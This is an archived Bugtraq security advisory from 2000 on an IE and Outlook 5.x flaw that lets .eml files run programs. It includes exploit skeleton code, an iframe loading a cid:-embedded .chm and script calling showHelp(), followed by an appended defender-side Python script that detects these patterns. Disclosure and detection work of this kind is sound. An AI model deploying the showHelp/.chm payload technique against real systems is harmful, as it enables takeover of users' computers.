[14289] in bugtraq
IE and Outlook 5.x allow executing arbitrary programs using .eml
daemon@ATHENA.MIT.EDU (Georgi Guninski)
Wed Mar 15 00:51:54 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Message-Id: <38CE4636.56B37C06@nat.bg>
Date: Tue, 14 Mar 2000 16:01:26 +0200
Reply-To: Georgi Guninski <joro@NAT.BG>
From: Georgi Guninski <joro@NAT.BG>
X-To: Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Georgi Guninski security advisory #9, 2000
IE and Outlook 5.x allow executing arbitrary programs using .eml files
Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or indirect use
of the information or functionality provided by this program.
Georgi Guninski bears NO responsibility for content or misuse of this
program or any derivatives thereof.
Description:
There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probably
others) which allows executing arbitrary programs using .eml files.
This may be exploited when browsing web pages or opening an email
message in Outlook.
This may lead to taking control over the user's computer.
It is also possible to read and send local files.
Details:
The problem is creating files in the TEMP directory with a known name and
arbitrary content.
One may place a .chm file in the TEMP directory which contains the
"shortcut" command and when the .chm file is opened with the showHelp()
method programs may be executed.
This vulnerability may be exploited by HTML email message in Outlook.
The code that must be included in a .eml file is:
---------------------------------------------------------------------------------------
....
<IFRAME align=3Dbaseline alt=3D"" =
border=3D0 hspace=3D0=20
src=3D"cid:000701bf8458$eb570380$dc0732d4@bbb"></IFRAME>
<SCRIPT>
setTimeout('window.showHelp("c:/windows/temp/abcde.chm");',1000);
setTimeout('window.showHelp("c:/temp/abcde.chm");',1000);
</SCRIPT>
.....
------=_NextPart_000_0008_01BF8469.AEE8FB40
Content-Type: application/binary;
name="abcde.chm"
Content-Transfer-Encoding: base64
Content-ID: <000701bf8458$eb570380$dc0732d4@bbb>
...Put the base64 encoded .chm file here...
------=_NextPart_000_0008_01BF8469.AEE8FB40--
---------------------------------------------------------------------------------------
Demonstration which starts Wordpad:
http://www.nat.bg/~joro/eml.html
Workaround: Disable Active Scripting.
Copyright 2000 Georgi Guninski
Regards,
Georgi Guninski
http://www.nat.bg/~joro
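An added, defender-side example that is not part of the advisory or the author's code: a small Python script that parses an .eml with the standard library and flags the two ingredients the advisory describes, an attachment embedded through a cid: reference whose name ends in .chm, and an HTML part that calls showHelp(). The sample message, its Content-ID and the extension list are constructed assumptions; the base64 body is dummy text, not a .chm file.

```python
import re
from email import message_from_string, policy

# Constructed sample .eml (not the advisory's file): an HTML part embeds an
# attachment via cid: and calls window.showHelp(); the base64 is dummy text.
SAMPLE_EML = """\
MIME-Version: 1.0
Content-Type: multipart/related; boundary="B1"

--B1
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<IFRAME border=3D0 src=3D"cid:part1@constructed.invalid"></IFRAME>
<SCRIPT>setTimeout('window.showHelp("c:/windows/temp/abcde.chm");',1000);</SCRIPT>
--B1
Content-Type: application/binary; name="abcde.chm"
Content-Transfer-Encoding: base64
Content-ID: <part1@constructed.invalid>

bm90IGEgcmVhbCBjaG0gZmlsZQ==
--B1--
"""

RISKY_EXT = (".chm", ".hta")  # assumption: local triage list, extend as needed
SHOWHELP_RE = re.compile(r"\bshowHelp\s*\(", re.IGNORECASE)
CID_RE = re.compile(r"""cid:([^"'\s>]+)""", re.IGNORECASE)

def audit_eml(raw: str) -> list[str]:
    """Return findings for an .eml: risky cid-embedded attachments, showHelp()."""
    msg = message_from_string(raw, policy=policy.default)
    cid_to_name, html = {}, []
    for part in msg.walk():
        if part.is_multipart():
            continue
        cid = part.get("Content-ID")
        if cid:  # map Content-ID -> filename taken from the name= parameter
            cid_to_name[cid.strip("<> ")] = part.get_filename() or ""
        if part.get_content_type() == "text/html":
            html.append(part.get_content())  # decodes quoted-printable (=3D)
    findings = [f"attachment with risky extension: {n}"
                for n in cid_to_name.values() if n.lower().endswith(RISKY_EXT)]
    for body in html:
        if SHOWHELP_RE.search(body):
            findings.append("HTML part calls showHelp()")
        for ref in CID_RE.findall(body):
            name = cid_to_name.get(ref, "")
            if name.lower().endswith(RISKY_EXT):
                findings.append(f"cid: reference resolves to {name}")
    return findings
```

Run it over a mail spool or a quarantine folder to find messages that pair a cid:-embedded help file with script that opens it; a plain-text message with no such parts yields no findings.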